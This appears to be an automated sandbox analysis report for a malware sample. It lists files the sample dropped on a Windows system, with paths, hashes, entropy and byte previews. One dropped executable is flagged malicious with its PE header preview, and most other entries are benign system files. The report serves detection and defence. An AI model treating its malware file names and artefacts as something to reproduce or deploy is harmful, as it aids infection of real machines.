                                                                                                                                                                                                    SHA-512:4B4AE7A33733B7B76F051F8A8BA7B4AB0E86CF68760D1EA6891390878C060D0BEBC5457D70D25F920DD4FA777F9B0B007A01E323C7234D73CC9C9ACDBC6E29E4
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:.........................................;...{...;...|.......|...............|.......|...........|...................*.J.....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                    C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.ca929a63-a4f5-46d8-adb0-5d93b35205e8.1.etl

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8192
                                                                                                                                                                                                    Entropy (8bit):2.450090112206548
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:iGtmEGt2GMRZqbt2YbtybtrBq7bt6cbt9/btKa/btMxbts:iiNiTZ5ZyZ4Z6cZNZNZAZs
                                                                                                                                                                                                    MD5:3E4880DDB501E9706C125E848F9FDAC3
                                                                                                                                                                                                    SHA1:593BB492A8E645607ED4446F8D94D550F8D0C274
                                                                                                                                                                                                    SHA-256:C361070C481E60E94D260CDC1F0B5984735CFDE03CA02D218AD0C2D0A74A6FC4
                                                                                                                                                                                                    SHA-512:54840AD1FB47E08DFE1C8439A16AD808AD6A96F8EB93D0D54C0592DD1B31DF9385AF3506AEE828A1995A655C3908D090C743082C4D1284074E98B689CC4650FB
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:............................................................................D...@.......3..u.v..................eJ..............Zb..K....(..........................................@.t.z.r.e.s...d.l.l.,.-.3.2.2.......................................................@.t.z.r.e.s...d.l.l.,.-.3.2.1..............................................................A.Y..........3..u.v..........U.p.d.a.t.e.S.e.s.s.i.o.n.O.r.c.h.e.s.t.r.a.t.i.o.n...C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.U.S.O.S.h.a.r.e.d.\.L.o.g.s.\.S.y.s.t.e.m.\.U.p.d.a.t.e.S.e.s.s.i.o.n.O.r.c.h.e.s.t.r.a.t.i.o.n...c.a.9.2.9.a.6.3.-.a.4.f.5.-.4.6.d.8.-.a.d.b.0.-.5.d.9.3.b.3.5.2.0.5.e.8...1...e.t.l...........P.P.@.......3..u.v..................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                    C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):5614592
                                                                                                                                                                                                    Entropy (8bit):6.625028493983766
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:98304:9p8Rhr3GBsnEHQ4ZFRQ0d/OxolgF2+BN9+cNUejaFZHF+1CzsMtnUUPZNj:9p8RhSZzGxEz+BN9+cNUhv+1C9tnUUh9
                                                                                                                                                                                                    MD5:DF65134B0B2B2CC03F07647794B274E5
                                                                                                                                                                                                    SHA1:C7859A067082AA31648A9B8F2ABD982C504DD0AF
                                                                                                                                                                                                    SHA-256:3E3E3BA56FD7260C9B12CCBE0310201D94F128757F31550E3C3D9D0F72899085
                                                                                                                                                                                                    SHA-512:1DCCCF9934F966F90D8D52A2392755EDCACE9E4D6DB456994BFD61ABE059775108D0BF1B9A810B9E0904590D1D2DE4DEE9204F96AD13F62E539F8D981D7DE8D7
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                                                                                                    Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d...5.qe.........."...........U.....@..........@............................. V...........`.....................................................<.....S..0....S...............V.x...............................(.......8...........@...`............................text...F........................... ..`.rdata..H%.......&..................@..@.data.....R.......R.................@....pdata........S......rS.............@..@.00cfg........S......tS.............@..@.tls..........S......vS.............@....rsrc....0....S..2...xS.............@..@.reloc..x.....V.......U.............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                    C:\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):999
                                                                                                                                                                                                    Entropy (8bit):4.966299883488245
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:Jd4T7gw4TchTGBLtKEHcHGuDyeHRuDye6MGFiP6euDyRtz:34T53VGLv8HGuDyeHRuDye6MGFiP6euy
                                                                                                                                                                                                    MD5:24567B9212F806F6E3E27CDEB07728C0
                                                                                                                                                                                                    SHA1:371AE77042FFF52327BF4B929495D5603404107D
                                                                                                                                                                                                    SHA-256:82F352AD3C9B3E58ECD3207EDC38D5F01B14D968DA908406BD60FD93230B69F6
                                                                                                                                                                                                    SHA-512:5D5E65FCD9061DADC760C9B3124547F2BABEB49FD56A2FD2FE2AD2211A1CB15436DB24308A0B5A87DA24EC6AB2A9B0C5242D828BE85BD1B2683F9468CE310904
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:.<?xml version="1.0" encoding="utf-8"?>..<software_identification_tag xmlns="http://standards.iso.org/iso/19770/-2/2009/schema.xsd">...<entitlement_required_indicator>true</entitlement_required_indicator>...<product_title>Windows 10 Pro</product_title>...<product_version>....<name>10.0.19041.1865</name>....<numeric>.....<major>10</major>.....<minor>0</minor>.....<build>19041</build>.....<review>1865</review>....</numeric>...</product_version>...<software_creator>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</software_creator>...<software_licensor>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</software_licensor>...<software_id>....<unique_id>Windows-10-Pro</unique_id>....<tag_creator_regid>regid.1991-06.com.microsoft</tag_creator_regid>...</software_id>...<tag_creator>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</tag_creator>..</software_identification_tag>..

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                    Size (bytes):20884
                                                                                                                                                                                                    Entropy (8bit):5.606009077553241
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:QMBrkgGjZJZfBkXhr7FhTRn4UaiQw0Yjn03Mcg4CPfbFlgqd:VrkXgXhrLTRtaLjw2TMbYqd
                                                                                                                                                                                                    MD5:204A7D1FCA6363923592AF1CB04D43E9
                                                                                                                                                                                                    SHA1:DBFF37569E6F344B6671FFA0B1A4024755CA3DAF
                                                                                                                                                                                                    SHA-256:C88EFAF932F22C35A480525E2E25517FBF0BA210D4600A2A5FA92331D9DDC62E
                                                                                                                                                                                                    SHA-512:CA42AC7BCDAC107A4EA0D783157262F1F99054A78B30ADB4719DD17C3B0A29753D8947F5654BD1C10A5EF55D321CD5A6E3FEE5ED9A76EC589F815C84CEE183B0
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:@...e........... .......S.................5..........@..........H...............o..b~.D.poM...P..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.....`.......System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.{.....#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...D....................+.H..!...e........System.Configuration.Ins

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ouzpc02.jnl.psm1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3xhp5dxa.c1z.ps1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bropukvx.0wn.ps1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gkt4bawe.gnn.ps1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ki4imu4d.aku.psm1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zqn2ogij.awp.psm1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):67684
                                                                                                                                                                                                    Entropy (8bit):7.829930120723189
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:IqjFspcGrjw2RAal82F5EwtJqF1WlDBGOFBbVEmX:Gprs2RARw5JqFoJnbhX
                                                                                                                                                                                                    MD5:EA159C2DE67A1E14B2B715E8C3625C29
                                                                                                                                                                                                    SHA1:735CACF1A08F721CCBD16DF1819E9195E413C62F
                                                                                                                                                                                                    SHA-256:95D1E84E1C136E0FF2A78A422228475C503715F953B3D121E13E6EF60CE3E81D
                                                                                                                                                                                                    SHA-512:E5C5FB77E448591C3AB72F9881A46DC36276CB5ED1D28427D8A13993752BEE7B6AC64E81AEA794C241680E087D39C192C6BF86033905A4E74049154CD0B3256D
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:......JFIF.............C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....W.....*w.=i)p}i*...QL..6..i..6.v=.q@....Q@...E.2.R)(...).......N.6.6.Z.JF.m4P42.u7i.`h...%!..Mj....(..IKI@.(........m:..h((..P1.z.R.PPR5-.......M..QNjm2...m?i...OZm:...-5.....F..E.!..N&..HJm:..c.M.w..)...F.ch.....)Z.@.jJst..P.Mj}4.h..E:.M......i.....L.X.C....E9..Xh)..I.E.jkT..i.DGH..ILci......X..........Z..!.i.........6.k..z....?Zn._..{sI...>...).H~.1AC.

                                                                                                                                                                                                    C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):55
                                                                                                                                                                                                    Entropy (8bit):4.306461250274409
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                                                    C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                    Size (bytes):4926
                                                                                                                                                                                                    Entropy (8bit):3.246100818649046
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:FaqdF78F7B+AAHdKoqKFxcxkFiF7KaqdF7f+AAHdKoqKFxcxkFg:cEOB+AAsoJjykePEf+AAsoJjyk2
                                                                                                                                                                                                    MD5:D3DD0CF7FE3E07A7248B86C87F501E14
                                                                                                                                                                                                    SHA1:DE6EE697785CD73A7C9FE5401CDF6AADCF59E0CD
                                                                                                                                                                                                    SHA-256:35A063382FDD32A5A6AF8C8592389EE8B34929F940D858A310A74A997E0CDFE9
                                                                                                                                                                                                    SHA-512:B2EA0305E25B4F3A25FF0D7FA2FDCF3FE7165CC532E7F5DA4CC79EE6FC286C6552663849C35BC89E0BEE678A546D96F26EAC53A9B33E275466BA3552AD5B2AFD
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. O.c.t. .. 0.6. .. 2.0.2.3. .1.1.:.3.5.:.2.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .W.S.C. .S.t.a.t.e. .I.n.f.o. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.

                                                                                                                                                                                                    C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                    Size (bytes):20884
                                                                                                                                                                                                    Entropy (8bit):5.471304084211427
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:ZMBrkgSJJpP36XhqaJrYItklgN5452YcR4Ct35cg4CvPnbculgqd:2r8dKXhqa1NtBHfRYTU/bcBqd
                                                                                                                                                                                                    MD5:0E3B9E8B8CD9F13D0BD8734650A51CA7
                                                                                                                                                                                                    SHA1:C7A8212D4A6875EA8F190376B196E0C6CFD21CF9
                                                                                                                                                                                                    SHA-256:9F1F119F31BC61A36627A892424173ED33422A3FA5907D089D22192BE707DFDE
                                                                                                                                                                                                    SHA-512:E2D6CE8C6D6E8111C62E8D79BA2A302C7257D61CB91BE28A35A484635332849B76D81E09B4C32F015963B5799519E718780F77FF1C4B8F5D03A385925549BF2E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:@...e........... ....................................@..........H...............o..b~.D.poM...P..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.....`.......System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.{.....#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...D....................+.H..!...e........System.Configuration.Ins

                                                                                                                                                                                                    C:\Windows\System32\winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    File Type:MS Windows Vista Event Log, 2 chunks (no. 1 in use), next record no. 42, DIRTY
                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                    Size (bytes):1052672
                                                                                                                                                                                                    Entropy (8bit):0.43222994401471093
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:GfhHBiQk1bdzpFEVQCd3iDzJiLQKiDBi4k1bdzpFEVQ35yY3dik5pmik5pbik5po:0h0w+qLpBVi7CPIhMVlrF+tuV
                                                                                                                                                                                                    MD5:232006E5297B5EC13906C51D27668C28
                                                                                                                                                                                                    SHA1:B614403CC56FB9E58E869F44D3B6308885D2B059
                                                                                                                                                                                                    SHA-256:D0BE632B3993F5E23D76493E82C6E27846C5356D81E29D7A30A9C711589643B7
                                                                                                                                                                                                    SHA-512:CFA5136C006D80142DA3CB005C20299C54E6F7F98A1451408D344D7C9BDF0608E73847BB9B4A947A7552D49695BB92C5BAA026BC766F294E18A14B84E8088EF1
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:ElfFile.................*....................................................................................................$@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                    C:\Windows\Temp\__PSScriptPolicyTest_1dqzfisx.swf.psm1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Windows\Temp\__PSScriptPolicyTest_ft13hkj2.md3.psm1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Windows\Temp\__PSScriptPolicyTest_ge2j1ypn.yrt.ps1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Windows\Temp\__PSScriptPolicyTest_iop5zmwn.mt2.ps1

                                                                                                                                                                                                    Download File
